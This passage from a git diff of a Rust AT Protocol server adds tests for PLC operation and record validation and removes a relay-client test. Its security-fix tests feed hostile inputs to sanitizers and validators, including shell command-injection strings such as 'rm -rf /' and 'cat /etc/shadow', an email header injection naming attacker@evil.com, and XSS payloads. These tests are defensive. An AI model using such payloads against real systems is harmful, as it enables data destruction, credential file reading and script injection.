expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
}
#[test]
fn test_validate_handle_match() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://wrong.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
}
#[test]
fn test_validate_pds_service_type() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "WrongServiceType",
"endpoint": "https://pds.example.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
}
#[test]
fn test_validate_pds_endpoint_match() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {"atproto": did_key.clone()},
"alsoKnownAs": ["at://test.handle"],
"services": {
"atproto_pds": {
"type": "AtprotoPersonalDataServer",
"endpoint": "https://wrong.endpoint.com"
}
},
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key.clone(),
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
}
#[test]
fn test_verify_signature_secp256k1() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [did_key.clone()],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let rotation_keys = vec![did_key];
let result = verify_operation_signature(&signed, &rotation_keys);
assert!(result.is_ok());
assert!(result.unwrap());
}
#[test]
fn test_verify_signature_wrong_key() {
let key = SigningKey::random(&mut rand::thread_rng());
let other_key = SigningKey::random(&mut rand::thread_rng());
let other_did_key = signing_key_to_did_key(&other_key);
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let wrong_rotation_keys = vec![other_did_key];
let result = verify_operation_signature(&signed, &wrong_rotation_keys);
assert!(result.is_ok());
assert!(!result.unwrap());
}
#[test]
fn test_verify_signature_invalid_did_key_format() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null
});
let signed = sign_operation(&op, &key).unwrap();
let invalid_keys = vec!["not-a-did-key".to_string()];
let result = verify_operation_signature(&signed, &invalid_keys);
assert!(result.is_ok());
assert!(!result.unwrap());
}
#[test]
fn test_tombstone_validation() {
let op = json!({
"type": "plc_tombstone",
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
"sig": "test"
});
let result = validate_plc_operation(&op);
assert!(result.is_ok());
}
#[test]
fn test_cid_for_cbor_deterministic() {
let value = json!({
"alpha": 1,
"beta": 2
});
let cid1 = cid_for_cbor(&value).unwrap();
let cid2 = cid_for_cbor(&value).unwrap();
assert_eq!(cid1, cid2, "CID generation should be deterministic");
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
}
#[test]
fn test_cid_different_for_different_data() {
let value1 = json!({"data": 1});
let value2 = json!({"data": 2});
let cid1 = cid_for_cbor(&value1).unwrap();
let cid2 = cid_for_cbor(&value2).unwrap();
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
}
#[test]
fn test_signing_key_to_did_key_format() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
assert!(did_key.len() > 50, "Did key should be reasonably long");
}
#[test]
fn test_signing_key_to_did_key_unique() {
let key1 = SigningKey::random(&mut rand::thread_rng());
let key2 = SigningKey::random(&mut rand::thread_rng());
let did1 = signing_key_to_did_key(&key1);
let did2 = signing_key_to_did_key(&key2);
assert_ne!(did1, did2, "Different keys should produce different did:keys");
}
#[test]
fn test_signing_key_to_did_key_consistent() {
let key = SigningKey::random(&mut rand::thread_rng());
let did1 = signing_key_to_did_key(&key);
let did2 = signing_key_to_did_key(&key);
assert_eq!(did1, did2, "Same key should produce same did:key");
}
#[test]
fn test_sign_operation_removes_existing_sig() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"prev": null,
"sig": "old_signature"
});
let signed = sign_operation(&op, &key).unwrap();
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
assert_ne!(new_sig, "old_signature", "Should replace old signature");
}
#[test]
fn test_validate_plc_operation_not_object() {
let result = validate_plc_operation(&json!("not an object"));
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_validate_for_submission_tombstone_passes() {
let key = SigningKey::random(&mut rand::thread_rng());
let did_key = signing_key_to_did_key(&key);
let op = json!({
"type": "plc_tombstone",
"prev": "bafyreig6xxxxxyyyyyzzzzzz",
"sig": "test"
});
let ctx = PlcValidationContext {
server_rotation_key: did_key.clone(),
expected_signing_key: did_key,
expected_handle: "test.handle".to_string(),
expected_pds_endpoint: "https://pds.example.com".to_string(),
};
let result = validate_plc_operation_for_submission(&op, &ctx);
assert!(result.is_ok(), "Tombstone should pass submission validation");
}
#[test]
fn test_verify_signature_missing_sig() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {}
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
}
#[test]
fn test_verify_signature_invalid_base64() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "not-valid-base64!!!"
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_plc_operation_struct() {
let mut services = HashMap::new();
services.insert("atproto_pds".to_string(), PlcService {
service_type: "AtprotoPersonalDataServer".to_string(),
endpoint: "https://pds.example.com".to_string(),
});
let mut verification_methods = HashMap::new();
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
let op = PlcOperation {
op_type: "plc_operation".to_string(),
rotation_keys: vec!["did:key:zTest123".to_string()],
verification_methods,
also_known_as: vec!["at://test.handle".to_string()],
services,
prev: None,
sig: Some("test".to_string()),
};
let json_value = serde_json::to_value(&op).unwrap();
assert_eq!(json_value["type"], "plc_operation");
assert!(json_value["rotationKeys"].is_array());
}

590
tests/record_validation.rs Normal file
View File

@@ -0,0 +1,590 @@
use bspds::validation::{RecordValidator, ValidationError, ValidationStatus, validate_record_key, validate_collection_nsid};
use serde_json::json;
fn now() -> String {
chrono::Utc::now().to_rfc3339()
}
#[test]
fn test_validate_post_valid() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello world!",
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_post_missing_text() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "text"));
}
#[test]
fn test_validate_post_missing_created_at() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "createdAt"));
}
#[test]
fn test_validate_post_text_too_long() {
let validator = RecordValidator::new();
let long_text = "a".repeat(3001);
let post = json!({
"$type": "app.bsky.feed.post",
"text": long_text,
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "text"));
}
#[test]
fn test_validate_post_text_at_limit() {
let validator = RecordValidator::new();
let limit_text = "a".repeat(3000);
let post = json!({
"$type": "app.bsky.feed.post",
"text": limit_text,
"createdAt": now()
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_post_too_many_langs() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"langs": ["en", "fr", "de", "es"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
}
#[test]
fn test_validate_post_three_langs_ok() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"langs": ["en", "fr", "de"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_post_too_many_tags() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
}
#[test]
fn test_validate_post_eight_tags_ok() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_post_tag_too_long() {
let validator = RecordValidator::new();
let long_tag = "t".repeat(641);
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Hello",
"createdAt": now(),
"tags": [long_tag]
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
}
#[test]
fn test_validate_profile_valid() {
let validator = RecordValidator::new();
let profile = json!({
"$type": "app.bsky.actor.profile",
"displayName": "Test User",
"description": "A test user profile"
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_profile_empty_ok() {
let validator = RecordValidator::new();
let profile = json!({
"$type": "app.bsky.actor.profile"
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_profile_displayname_too_long() {
let validator = RecordValidator::new();
let long_name = "n".repeat(641);
let profile = json!({
"$type": "app.bsky.actor.profile",
"displayName": long_name
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
}
#[test]
fn test_validate_profile_description_too_long() {
let validator = RecordValidator::new();
let long_desc = "d".repeat(2561);
let profile = json!({
"$type": "app.bsky.actor.profile",
"description": long_desc
});
let result = validator.validate(&profile, "app.bsky.actor.profile");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "description"));
}
#[test]
fn test_validate_like_valid() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_like_missing_subject() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
#[test]
fn test_validate_like_missing_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
}
#[test]
fn test_validate_like_invalid_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "https://example.com/not-at-uri",
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
}
#[test]
fn test_validate_repost_valid() {
let validator = RecordValidator::new();
let repost = json!({
"$type": "app.bsky.feed.repost",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_repost_missing_subject() {
let validator = RecordValidator::new();
let repost = json!({
"$type": "app.bsky.feed.repost",
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
#[test]
fn test_validate_follow_valid() {
let validator = RecordValidator::new();
let follow = json!({
"$type": "app.bsky.graph.follow",
"subject": "did:plc:test12345",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_follow_missing_subject() {
let validator = RecordValidator::new();
let follow = json!({
"$type": "app.bsky.graph.follow",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
#[test]
fn test_validate_follow_invalid_subject() {
let validator = RecordValidator::new();
let follow = json!({
"$type": "app.bsky.graph.follow",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
#[test]
fn test_validate_block_valid() {
let validator = RecordValidator::new();
let block = json!({
"$type": "app.bsky.graph.block",
"subject": "did:plc:blocked123",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_block_invalid_subject() {
let validator = RecordValidator::new();
let block = json!({
"$type": "app.bsky.graph.block",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
#[test]
fn test_validate_list_valid() {
let validator = RecordValidator::new();
let list = json!({
"$type": "app.bsky.graph.list",
"name": "My List",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_list_name_too_long() {
let validator = RecordValidator::new();
let long_name = "n".repeat(65);
let list = json!({
"$type": "app.bsky.graph.list",
"name": long_name,
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
}
#[test]
fn test_validate_list_empty_name() {
let validator = RecordValidator::new();
let list = json!({
"$type": "app.bsky.graph.list",
"name": "",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
}
#[test]
fn test_validate_feed_generator_valid() {
let validator = RecordValidator::new();
let generator = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": "My Feed",
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_feed_generator_displayname_too_long() {
let validator = RecordValidator::new();
let long_name = "f".repeat(241);
let generator = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": long_name,
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
}
#[test]
fn test_validate_unknown_type_returns_unknown() {
let validator = RecordValidator::new();
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
}
#[test]
fn test_validate_unknown_type_strict_rejects() {
let validator = RecordValidator::new().require_lexicon(true);
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
}
#[test]
fn test_validate_type_mismatch() {
let validator = RecordValidator::new();
let record = json!({
"$type": "app.bsky.feed.like",
"subject": {"uri": "at://test", "cid": "bafytest"},
"createdAt": now()
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"));
}
#[test]
fn test_validate_missing_type() {
let validator = RecordValidator::new();
let record = json!({
"text": "Hello"
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingType)));
}
#[test]
fn test_validate_not_object() {
let validator = RecordValidator::new();
let record = json!("just a string");
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_datetime_format_valid() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00.000Z"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_datetime_with_offset() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00+05:30"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_datetime_invalid_format() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024/01/15"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
}
#[test]
fn test_validate_record_key_valid() {
assert!(validate_record_key("3k2n5j2").is_ok());
assert!(validate_record_key("valid-key").is_ok());
assert!(validate_record_key("valid_key").is_ok());
assert!(validate_record_key("valid.key").is_ok());
assert!(validate_record_key("valid~key").is_ok());
assert!(validate_record_key("self").is_ok());
}
#[test]
fn test_validate_record_key_empty() {
let result = validate_record_key("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_record_key_dot() {
assert!(validate_record_key(".").is_err());
assert!(validate_record_key("..").is_err());
}
#[test]
fn test_validate_record_key_invalid_chars() {
assert!(validate_record_key("invalid/key").is_err());
assert!(validate_record_key("invalid key").is_err());
assert!(validate_record_key("invalid@key").is_err());
assert!(validate_record_key("invalid#key").is_err());
}
#[test]
fn test_validate_record_key_too_long() {
let long_key = "k".repeat(513);
let result = validate_record_key(&long_key);
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_record_key_at_max_length() {
let max_key = "k".repeat(512);
assert!(validate_record_key(&max_key).is_ok());
}
#[test]
fn test_validate_collection_nsid_valid() {
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
assert!(validate_collection_nsid("a.b.c").is_ok());
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
}
#[test]
fn test_validate_collection_nsid_empty() {
let result = validate_collection_nsid("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_collection_nsid_too_few_segments() {
assert!(validate_collection_nsid("a").is_err());
assert!(validate_collection_nsid("a.b").is_err());
}
#[test]
fn test_validate_collection_nsid_empty_segment() {
assert!(validate_collection_nsid("a..b.c").is_err());
assert!(validate_collection_nsid(".a.b.c").is_err());
assert!(validate_collection_nsid("a.b.c.").is_err());
}
#[test]
fn test_validate_collection_nsid_invalid_chars() {
assert!(validate_collection_nsid("a.b.c/d").is_err());
assert!(validate_collection_nsid("a.b.c_d").is_err());
assert!(validate_collection_nsid("a.b.c@d").is_err());
}
#[test]
fn test_validate_threadgate() {
let validator = RecordValidator::new();
let gate = json!({
"$type": "app.bsky.feed.threadgate",
"post": "at://did:plc:test/app.bsky.feed.post/123",
"createdAt": now()
});
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_labeler_service() {
let validator = RecordValidator::new();
let labeler = json!({
"$type": "app.bsky.labeler.service",
"policies": {
"labelValues": ["spam", "nsfw"]
},
"createdAt": now()
});
let result = validator.validate(&labeler, "app.bsky.labeler.service");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_list_item() {
let validator = RecordValidator::new();
let item = json!({
"$type": "app.bsky.graph.listitem",
"subject": "did:plc:test123",
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
"createdAt": now()
});
let result = validator.validate(&item, "app.bsky.graph.listitem");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}

View File

@@ -1,86 +0,0 @@
mod common;
use common::*;
use axum::{extract::ws::Message, routing::get, Router};
use bspds::{
state::AppState,
sync::{firehose::SequencedEvent, relay_client::start_relay_clients},
};
use chrono::Utc;
use tokio::net::TcpListener;
use tokio::sync::mpsc;
async fn mock_relay_server(
listener: TcpListener,
event_tx: mpsc::Sender<Vec<u8>>,
connected_tx: mpsc::Sender<()>,
) {
let handler = |ws: axum::extract::ws::WebSocketUpgrade| async {
ws.on_upgrade(move |mut socket| async move {
let _ = connected_tx.send(()).await;
while let Some(Ok(msg)) = socket.recv().await {
if let Message::Binary(bytes) = msg {
let _ = event_tx.send(bytes.to_vec()).await;
break;
}
}
})
};
let app = Router::new().route("/", get(handler));
axum::serve(listener, app.into_make_service())
.await
.unwrap();
}
#[tokio::test]
async fn test_outbound_relay_client() {
let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
let addr = listener.local_addr().unwrap();
let (event_tx, mut event_rx) = mpsc::channel(1);
let (connected_tx, _connected_rx) = mpsc::channel::<()>(1);
tokio::spawn(mock_relay_server(listener, event_tx, connected_tx));
let relay_url = format!("ws://{}", addr);
let db_url = get_db_connection_string().await;
let pool = sqlx::postgres::PgPoolOptions::new()
.connect(&db_url)
.await
.unwrap();
let state = AppState::new(pool).await;
let (ready_tx, ready_rx) = mpsc::channel(1);
start_relay_clients(state.clone(), vec![relay_url], Some(ready_rx)).await;
tokio::time::timeout(
tokio::time::Duration::from_secs(5),
async {
ready_tx.closed().await;
}
)
.await
.expect("Timeout waiting for relay client to be ready");
let dummy_event = SequencedEvent {
seq: 1,
did: "did:plc:test".to_string(),
created_at: Utc::now(),
event_type: "commit".to_string(),
commit_cid: Some("bafyreihffx5a4o3qbv7vp6qmxpxok5mx5xvlsq6z4x3xv3zqv7vqvc7mzy".to_string()),
prev_cid: None,
ops: Some(serde_json::json!([])),
blobs: Some(vec![]),
blocks_cids: Some(vec![]),
};
state.firehose_tx.send(dummy_event).unwrap();
let received_bytes = tokio::time::timeout(
tokio::time::Duration::from_secs(5),
event_rx.recv()
)
.await
.expect("Timeout waiting for event")
.expect("Event channel closed");
assert!(!received_bytes.is_empty());
}

377
tests/security_fixes.rs Normal file
View File

@@ -0,0 +1,377 @@
mod common;
use bspds::notifications::{
SendError, is_valid_phone_number, sanitize_header_value,
};
use bspds::oauth::templates::{login_page, error_page, success_page};
use bspds::image::{ImageProcessor, ImageError};
#[test]
fn test_sanitize_header_value_removes_crlf() {
let malicious = "Injected\r\nBcc: attacker@evil.com";
let sanitized = sanitize_header_value(malicious);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(sanitized.contains("Injected"), "Original content should be preserved");
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
}
#[test]
fn test_sanitize_header_value_preserves_content() {
let normal = "Normal Subject Line";
let sanitized = sanitize_header_value(normal);
assert_eq!(sanitized, "Normal Subject Line");
}
#[test]
fn test_sanitize_header_value_trims_whitespace() {
let padded = " Subject ";
let sanitized = sanitize_header_value(padded);
assert_eq!(sanitized, "Subject");
}
#[test]
fn test_sanitize_header_value_handles_multiple_newlines() {
let input = "Line1\r\nLine2\nLine3\rLine4";
let sanitized = sanitize_header_value(input);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
}
#[test]
fn test_email_header_injection_sanitization() {
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
let sanitized = sanitize_header_value(header_injection);
let lines: Vec<&str> = sanitized.split("\r\n").collect();
assert_eq!(lines.len(), 1, "Should be a single line after sanitization");
assert!(sanitized.contains("Normal Subject"), "Original content preserved");
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
assert!(sanitized.contains("X-Injected:"), "All content on same line");
}
#[test]
fn test_valid_phone_number_accepts_correct_format() {
assert!(is_valid_phone_number("+1234567890"));
assert!(is_valid_phone_number("+12025551234"));
assert!(is_valid_phone_number("+442071234567"));
assert!(is_valid_phone_number("+4915123456789"));
assert!(is_valid_phone_number("+1"));
}
#[test]
fn test_valid_phone_number_rejects_missing_plus() {
assert!(!is_valid_phone_number("1234567890"));
assert!(!is_valid_phone_number("12025551234"));
}
#[test]
fn test_valid_phone_number_rejects_empty() {
assert!(!is_valid_phone_number(""));
}
#[test]
fn test_valid_phone_number_rejects_just_plus() {
assert!(!is_valid_phone_number("+"));
}
#[test]
fn test_valid_phone_number_rejects_too_long() {
assert!(!is_valid_phone_number("+12345678901234567890123"));
}
#[test]
fn test_valid_phone_number_rejects_letters() {
assert!(!is_valid_phone_number("+abc123"));
assert!(!is_valid_phone_number("+1234abc"));
assert!(!is_valid_phone_number("+a"));
}
#[test]
fn test_valid_phone_number_rejects_spaces() {
assert!(!is_valid_phone_number("+1234 5678"));
assert!(!is_valid_phone_number("+ 1234567890"));
assert!(!is_valid_phone_number("+1 "));
}
#[test]
fn test_valid_phone_number_rejects_special_chars() {
assert!(!is_valid_phone_number("+123-456-7890"));
assert!(!is_valid_phone_number("+1(234)567890"));
assert!(!is_valid_phone_number("+1.234.567.890"));
}
#[test]
fn test_signal_recipient_command_injection_blocked() {
let malicious_inputs = vec![
"+123; rm -rf /",
"+123 && cat /etc/passwd",
"+123`id`",
"+123$(whoami)",
"+123|cat /etc/shadow",
"+123\n--help",
"+123\r\n--version",
"+123--help",
];
for input in malicious_inputs {
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
}
}
#[test]
fn test_image_file_size_limit_enforced() {
let processor = ImageProcessor::new();
let oversized_data: Vec<u8> = vec![0u8; 11 * 1024 * 1024];
let result = processor.process(&oversized_data, "image/jpeg");
match result {
Err(ImageError::FileTooLarge { .. }) => {}
Err(other) => {
let msg = format!("{:?}", other);
if !msg.to_lowercase().contains("size") && !msg.to_lowercase().contains("large") {
panic!("Expected FileTooLarge error, got: {:?}", other);
}
}
Ok(_) => panic!("Should reject files over size limit"),
}
}
#[test]
fn test_image_file_size_limit_configurable() {
let processor = ImageProcessor::new().with_max_file_size(1024);
let data: Vec<u8> = vec![0u8; 2048];
let result = processor.process(&data, "image/jpeg");
assert!(result.is_err(), "Should reject files over configured limit");
}
#[test]
fn test_oauth_template_xss_escaping_client_id() {
let malicious_client_id = "<script>alert('xss')</script>";
let html = login_page(malicious_client_id, None, None, "test-uri", None, None);
assert!(!html.contains("<script>"), "Script tags should be escaped");
assert!(html.contains("&lt;script&gt;"), "HTML entities should be used for escaping");
}
#[test]
fn test_oauth_template_xss_escaping_client_name() {
let malicious_client_name = "<img src=x onerror=alert('xss')>";
let html = login_page("client123", Some(malicious_client_name), None, "test-uri", None, None);
assert!(!html.contains("<img "), "IMG tags should be escaped");
